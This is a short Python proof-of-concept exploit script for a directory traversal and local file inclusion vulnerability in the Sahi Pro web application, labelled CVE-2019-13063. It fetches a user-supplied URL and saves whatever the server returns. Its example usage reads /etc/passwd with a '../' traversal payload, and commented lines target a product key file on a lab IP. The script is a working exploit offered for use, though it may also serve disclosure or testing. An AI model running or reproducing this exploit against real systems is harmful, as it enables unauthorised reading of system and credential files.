import argparse
import requests

"""
#sahi_productkey = '/config/productkey.txt'
#root_dir = '../../../../../../'
#vuln_url = "http://10.0.0.167:9999/_s_/dyn/Script_view?script="
"""

print("[x] Proof of concept tool to exploit the directory traversal and local file"
      " inclusion vulnerability that resides in the Sahi-Pro webapplication\n[x] CVE-2019-xxxxxx\n")

print("Example usage:\npython3 CVE-2019-13063-POC.py --url http://example:9999/_s_/dyn/Script_view?script=../../../../etc/passwd")

parser = argparse.ArgumentParser()
parser.add_argument("--url", help='Specify the vulnerable URL')

args = parser.parse_args()

try:
    response = requests.get(args.url)
    file = open("output.txt", "w")
    file.write(response.text)
    file.close()
    print(response.text, "\n" * 5)
    print("Files succesfully recovered")

except Exception:
    print("[!] An error has occured")